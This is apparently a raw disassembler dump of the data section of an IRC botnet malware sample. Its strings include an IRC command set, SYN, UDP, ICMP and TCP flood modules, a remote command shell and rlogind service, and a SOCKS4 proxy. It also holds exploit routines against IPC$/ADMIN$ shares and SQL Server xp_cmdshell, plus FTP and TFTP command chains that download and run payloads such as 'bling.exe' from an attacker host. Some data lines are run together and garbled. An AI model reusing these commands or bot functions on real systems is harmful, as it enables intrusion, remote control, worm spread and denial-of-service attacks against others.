aNetinfo db 'netinfo',0 ; DATA XREF: sub_408A18+129C�o
aClg db 'clg',0 ; DATA XREF: sub_408A18+1288�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_408A18+1274�o
align 10h
aLg db 'lg',0 ; DATA XREF: sub_408A18+1260�o
align 4
aLog_0 db 'log',0 ; DATA XREF: sub_408A18+124C�o
aAl db 'al',0 ; DATA XREF: sub_408A18+1238�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_408A18+1224�o
aT: ; DATA XREF: sub_408A18+1210�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_408A18+11FC�o
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_408A18+11C4�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_408A18+11BD�o
align 10h
aReboot db 'reboot',0 ; DATA XREF: sub_408A18+11AA�o
align 4
aI_0: ; DATA XREF: sub_408A18+1196�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_408A18+1182�o
align 10h
aS_4: ; DATA XREF: sub_408A18+116E�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_408A18+115A�o
align 4
aQ: ; DATA XREF: sub_408A18+1146�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_408A18+1132�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_408A18+111E�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_408A18+110A�o
align 4
aR: ; DATA XREF: sub_408A18+10F6�o
; sub_408A18+1949�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_408A18+10E2�o
align 4
aStats db 'stats',0 ; DATA XREF: sub_408A18+10CE�o
align 10h
aScanstats db 'scanstats',0 ; DATA XREF: sub_408A18+10BA�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_408A18+10AC�o
; sub_408A18+588F�o
align 4
aScan_1 db 'Scan',0 ; DATA XREF: sub_408A18+10A7�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_408A18+1092�o
align 4
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_408A18+1084�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_408A18+107F�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_408A18+106A�o
align 4
aClones db '[CLONES]',0 ; DATA XREF: sub_408A18+105C�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_408A18+1057�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_408A18+1042�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_408A18+102E�o
align 10h
aProcsstop db 'procsstop',0 ; DATA XREF: sub_408A18+101A�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_408A18+1006�o
align 4
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_408A18+FF2�o
align 4
aTftp_0 db '[TFTP]',0 ; DATA XREF: sub_408A18+FE4�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_408A18+FCA�o
align 4
aTcpFlood db 'TCP flood',0 ; DATA XREF: sub_408A18+FBF�o
align 4
aTcpstop db 'tcpstop',0 ; DATA XREF: sub_408A18+FAA�o
aIcmp_0 db '[ICMP]',0 ; DATA XREF: sub_408A18:loc_4099B4�o
align 4
aIcmpFlood db 'ICMP flood',0 ; DATA XREF: sub_408A18+F97�o
align 10h
aIcmpstop db 'icmpstop',0 ; DATA XREF: sub_408A18+F82�o
align 4
aPing_1 db '[PING]',0 ; DATA XREF: sub_408A18+F74�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_408A18+F6F�o
align 10h
aPingstop db 'pingstop',0 ; DATA XREF: sub_408A18+F5A�o
align 4
aUpd db '[UPD]',0 ; DATA XREF: sub_408A18+F4C�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_408A18+F47�o
align 10h
aUdpstop db 'udpstop',0 ; DATA XREF: sub_408A18+F32�o
aSyn_0 db '[SYN]',0 ; DATA XREF: sub_408A18+F24�o
align 10h
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_408A18+F1F�o
align 4
aSynstop db 'synstop',0 ; DATA XREF: sub_408A18+F0A�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_408A18+EFC�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_408A18+EF7�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_408A18+EE2�o
align 4
aRedirect_0 db '[REDIRECT]',0 ; DATA XREF: sub_408A18+ED4�o
align 10h
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_408A18+ECF�o
align 10h
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_408A18+EBA�o
align 10h
aLog db '[LOG]',0 ; DATA XREF: sub_408A18+EAC�o
align 4
aLogList db 'Log list',0 ; DATA XREF: sub_408A18+EA7�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_408A18+E92�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_408A18+E84�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_408A18+E6A�o
align 10h
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_408A18+E5C�o
align 4
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_408A18+E42�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_408A18+E34�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_408A18+E2F�o
; sub_408A18+E57�o ...
align 4
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_408A18+E1A�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_408A18+E06�o
align 4
aSocks4 db 'socks4',0 ; DATA XREF: sub_408A18+DF2�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_408A18+DDE�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_408A18+DCA�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_408A18+DB6�o
; sub_408A18+4E2A�o
aSecure db 'secure',0 ; DATA XREF: sub_408A18+DA2�o
; sub_408A18+4E1A�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_408A18+D8E�o
aVersion db 'version',0 ; DATA XREF: sub_408A18+D7A�o
aLo db 'lo',0 ; DATA XREF: sub_408A18+D66�o
align 4
aLogout db 'logout',0 ; DATA XREF: sub_408A18+D52�o
align 4
aD: ; DATA XREF: sub_408A18+D3E�o
; sub_413FFD+7A�o
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_408A18+D2A�o
aRn db 'rn',0 ; DATA XREF: sub_408A18+D16�o
align 4
aRndnick db 'rndnick',0 ; DATA XREF: sub_408A18+CFF�o
a63 db '63',0 ; DATA XREF: sub_408A18+BE1�o
align 4
asc_4278D4: ; DATA XREF: sub_408A18+BB9�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_408A18+B81�o
align 10h
aServer_1 db '$server',0 ; DATA XREF: sub_408A18+B76�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_408A18+B65�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_408A18+B47�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_408A18+B36�o
align 4
aMe db '$me',0 ; DATA XREF: sub_408A18+B24�o
aD_0 db '$%d',0 ; DATA XREF: sub_408A18+ABB�o
aD_1 db '$%d-',0 ; DATA XREF: sub_408A18+A08�o
align 4
dword_427914 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_408A18+96E�o
dd 0A0Dh
dword_42792C dd 4E495001h, 47hdword_427934 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_408A18+931�o
dd 0D017325h, 0Ah
dword_427950 dd 52455601h, 4E4F4953h, 1dword_42795C dd 23h dword_427960 dd 6Ch dword_427964 dd 323333h ; sub_408A18+7E9�o ...
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_408A18+6F0�o
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_408A18+690�o
align 4
a353 db '353',0 ; DATA XREF: sub_408A18+63E�o
aPart db 'PART',0 ; DATA XREF: sub_408A18+5C2�o
align 10h
aSS_3 db ':%s%s',0 ; DATA XREF: sub_408A18+593�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_408A18+3E4�o
align 10h
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+370�o
; sub_408A18+6CE�o
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_408A18+357�o
; sub_408A18+4F68�o ...
aKick db 'KICK',0 ; DATA XREF: sub_408A18+2D7�o
align 4
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+26E�o
; sub_408A18+3D80�o ...
align 10h
a433 db '433',0 ; DATA XREF: sub_408A18+24B�o
a@: ; DATA XREF: sub_408A18+222�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_408A18+215�o
a005 db '005',0 ; DATA XREF: sub_408A18+202�o
a001 db '001',0 ; DATA XREF: sub_408A18+1EF�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+1D2�o
; sub_408A18+354E�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_408A18+1B0�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_408A18+19A�o
align 4
asc_427A38: ; DATA XREF: sub_408A18+188�o
; sub_408A18+5B44�o
unicode 0, <!>,0
aSecureSystemSe db '[SECURE]: System secure monitor active.',0 ; DATA XREF: sub_40E745+38F�o
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40E745+356�o
align 4
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40E745+286�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_40ED35+153�o
aRedirectClient db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40ED35+DB�o
align 4
aRedirectFail_1 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40EF12+13F�o
align 10h
aRedirectClie_0 db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40EF12+DD�o
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40F101+35�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_40F18F:loc_40F2F3�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_40F18F+141�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_40F18F:loc_40F29E�o
align 10h
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_40F31C+18E�o
align 10h
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_40F31C+146�o
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40F31C+1F�o
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_40F4CB:loc_40F4FD�o
align 10h
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_40F516+39�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_40F563+1EF�o
align 4
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_40F563+1CF�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_40F563+1AF�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_40F563+184�o
align 4
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_40F563+F4�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40F76F+215�o
align 4
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40F76F+1C9�o
align 10h
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40F76F+158�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_40F76F+FF�o
align 4
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_40F76F+70�o
align 4
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_40F76F+3E�o
align 10h
aSI db '%s%i',0 ; DATA XREF: sub_40F9EB+40�o
; .text:0040FAE6�o ...
align 4
aPc db 'PC',0 ; DATA XREF: .text:0040FAB4�o
align 4
aS_7 db '[%s]',0 ; DATA XREF: .text:0040FC1C�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40FC13�o
; sub_41175C:loc_4117FD�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040FC0C�o
aXp_0 db 'XP',0 ; DATA XREF: .text:0040FC01�o
; sub_41175C+8B�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040FBF4�o
; sub_41175C+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040FBE1�o
; sub_41175C+68�o
align 4
a98 db '98',0 ; DATA XREF: .text:0040FBD4�o
; sub_41175C+59�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:0040FBC7�o
; sub_41175C+4A�o
align 10h
a95 db '95',0 ; DATA XREF: .text:0040FBBC�o
; sub_41175C+39�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_40FC65+39�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_40FC65+2B�o
; sub_40FC65+50�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_40FD93+85�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_40FE55+40�o
align 4
aD_2 db 'D:\',0 ; DATA XREF: .data:0042C384�o
aD_3 db 'D$',0 ; DATA XREF: .data:0042C380�o
align 10h
aC_2 db 'C:\',0 ; DATA XREF: .data:0042C37C�o
aC_3 db 'C$',0 ; DATA XREF: .data:0042C378�o
align 4
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:0042C370�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_42C368�o
align 4
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_40FF1B+2E8�o
; sub_410242+2DA�o
align 4
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_40FF1B+2D2�o
align 4
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_40FF1B:loc_410186�o
align 10h
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_40FF1B+264�o
align 10h
aSecureFailed_3 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_40FF1B:loc_4100F6�o
align 4
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_40FF1B+1D4�o
align 4
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_40FF1B:loc_41004E�o
; sub_410242:loc_410371�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_40FF1B:loc_410047�o
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_40FF1B:loc_41002F�o
align 4
aSecureFailed_1 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_40FF1B+10D�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_40FF1B+EE�o
; sub_410242+EE�o
align 4
aSecureFailed_0 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_40FF1B+92�o
; sub_410242+92�o
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_40FF1B:loc_40FF8F�o
align 10h
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_40FF1B+6D�o
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_40FF1B+55�o
; sub_410242+55�o
align 4
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_410242+2C2�o
aC_0 db '%c:\',0 ; DATA XREF: sub_410242+22C�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_410242+21B�o
aSecureFailed_7 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_410242:loc_4103F0�o
; sub_410242:loc_4104B7�o
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_410242+1A7�o
; sub_410242+26E�o
aSecureFailed_6 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_410242:loc_41036A�o
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_410242:loc_410352�o
align 4
aSecureFailed_5 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_410242+109�o
align 10h
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_410242:loc_4102B6�o
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_410242+6D�o
align 4
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_4105D1+B7�o
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_4105D1+80�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_41069D+89�o
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_41084F+B2�o
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_41084F+82�o
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_41084F+5F�o
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_41094B+E2�o
align 4
aRlogindFaile_6 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_41094B+59�o
; sub_41094B+8F�o
db '.',0
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_410E50+1A7�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_410E50+187�o
align 4
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_410E50+F6�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_411080+1A1�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_411080+16C�o
align 4
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_411080+107�o
align 4
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_41126C+242�o
align 4
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_411540+48�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_4115DB+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_41175C+247�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 10h
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41175C+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41175C:loc_41188F�o
align 4
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_41175C+C0�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_4119C3+99�o
align 4
off_42875C dd offset loc_412F4B+3 ; DATA XREF: sub_4119C3+67�o
dword_428760 dd 4E414Ch dword_428764 dd 6C616944h, 70752Dhdword_42876C dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_411A79+509�o
db 'd: <%d>.',0
align 10h
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_411A79+49C�o
db 'c (%dMB).',0
align 4
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_411A79+124�o
align 4
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_411A79+F0�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_411A79+75�o
align 4
dword_42889C dd 4000500h, 7868746Bh, 0aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_411FA9+44C�o
align 4
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_411FA9+395�o
align 4
dword_4288FC dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411FA9+379�o
aTftpFileTransf db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_411FA9+324�o
align 10h
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_411FA9+14D�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_411FA9+6C�o
aOctet db 'octet',0 ; DATA XREF: sub_411FA9+11�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_4124DC+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_4126A7+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_4126A7+35�o
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_4127BC+2B8�o
; .text:00412F5A�o ...
align 4
aHostSContentTy db 'Host: %s',0Dh,0Ah ; DATA XREF: sub_4127BC+1BA�o
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_1 db ' HTTP/1.1',0Dh,0Ah,0 ; DATA XREF: sub_4127BC+183�o
aSearch db 'SEARCH /',0 ; DATA XREF: sub_4127BC+CC�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: .text:00412EC4�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: .text:00412E9A�o
aNilsisgay db 'NILSISGAY!!',0 ; DATA XREF: .text:00412D6B�o
; ---------------------------------------------------------------------------
loc_428AEC: ; DATA XREF: .text:00412D58�o
jmp short loc_428AFD
; ---------------------------------------------------------------------------
align 10h
dword_428AF0 dd 2016280h, 100BDh, 8F160001h db 82h
; ---------------------------------------------------------------------------
loc_428AFD: ; CODE XREF: .rdata:loc_428AEC�j
add [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 2 dup(0)
aEchoOpenSDOE_0 db 'echo open %s %d>o&echo USER a>>o&echo a>>o&echo binary>>o&echo ge'
; DATA XREF: sub_412FB5+8E�o
; .text:00413C6E�o
db 't resource32w.exe>>o&echo quit>>o&ftp -n -s:o&del o&resource32w.e'
db 'xe',0Dh,0Ah,0
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_4130F8+27�o
; .text:00413734�o
align 4
dword_428B9C dd 1CEC8166h ; .text:004136E0�r
dword_428BA0 dd 0E4FF07h ; .text:004136EA�r
aSTryingToXploi db '[%s]: Trying to Xploit IP: %s.',0 ; DATA XREF: .text:00413CE5�o
align 4
aSExploitingI_0 db '[%s]: Exploiting IP: (%s:%d) User: (%s/%s).',0
; DATA XREF: .text:00413F56�o
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:00413EDD�o
align 4
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'%s',27h,0 ; DATA XREF: .text:00413EC8�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET %s',27h,0
; DATA XREF: .text:00413E91�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: .text:00413E06�o
align 10h
aSExploitingI_1 db '[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
; DATA XREF: sub_413FFD+206�o
align 4
aNoPassword db '(no password)',0 ; DATA XREF: sub_413FFD+1E4�o
align 4
aSSS_3 db '%s\%s\%s',0 ; DATA XREF: sub_413FFD+CB�o
align 10h
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_413FFD+6C�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_413FFD+65�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_413FFD+5E�o
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: .text:00414333�o
aS_6 db '\\%s',0 ; DATA XREF: .text:004142F5�o
align 4
stru_428D38 _msEH <0FFFFFFFFh, 0, offset sub_414A09> ; DATA XREF: sub_4149C3+2�o
align 8
stru_428D48 _msEH <0FFFFFFFFh, 0, offset sub_414A67> ; DATA XREF: sub_414A14+2�o
align 8
stru_428D58 _msEH <0FFFFFFFFh, 0, offset sub_414BB0> ; DATA XREF: sub_414B6E+2�o
align 8
stru_428D68 _msEH <0FFFFFFFFh, 0, offset sub_414D1A> ; DATA XREF: sub_414BBA+2�o
align 8
stru_428D78 _msEH <0FFFFFFFFh, 0, offset sub_414DB9> ; DATA XREF: sub_414D67+2�o
align 8
stru_428D88 _msEH <0FFFFFFFFh, 0, offset sub_414E45> ; DATA XREF: sub_414DD6+2�o
align 8
stru_428D98 _msEH <0FFFFFFFFh, offset loc_4151D4, offset loc_4151D8>
; DATA XREF: sub_415136+2�o
align 8
stru_428DA8 _msEH <0FFFFFFFFh, 0, offset sub_415D03> ; DATA XREF: sub_415CAF+2�o
align 8
stru_428DB8 _msEH <0FFFFFFFFh, 0, offset sub_415ED0> ; DATA XREF: sub_415E55+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_415F19+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_415F19�o
stru_428DE0 _msEH <0FFFFFFFFh, 0, offset sub_416296> ; DATA XREF: sub_416257+2�o
; sub_416662+53�r
align 10h
stru_428DF0 _msEH <0FFFFFFFFh, offset loc_416481, offset loc_416495>
; DATA XREF: .text:004162EB�o
align 10h
byte_428E00 db 6 ; DATA XREF: sub_416662:loc_4166C3�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .data:off_42D7CC�o
unicode 0, <(null)>,0
align 4
aNull_1 db '(null)',0 ; DATA XREF: .data:off_42D7C8�o
align 8
stru_428E78 _msEH <0FFFFFFFFh, offset loc_4173E0, offset loc_4173E4>
; DATA XREF: sub_416F0B+5�o
align 8
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_429008 _msEH <0FFFFFFFFh, 0, offset sub_417C80> ; DATA XREF: sub_417C4E+2�o
align 8
stru_429018 _msEH <0FFFFFFFFh, 0, offset sub_417D80> ; DATA XREF: sub_417D0C+2�o
align 8
stru_429028 _msEH <0FFFFFFFFh, 0, offset sub_417F29> ; DATA XREF: sub_417E5D+2�o
dd 2 dup(0)
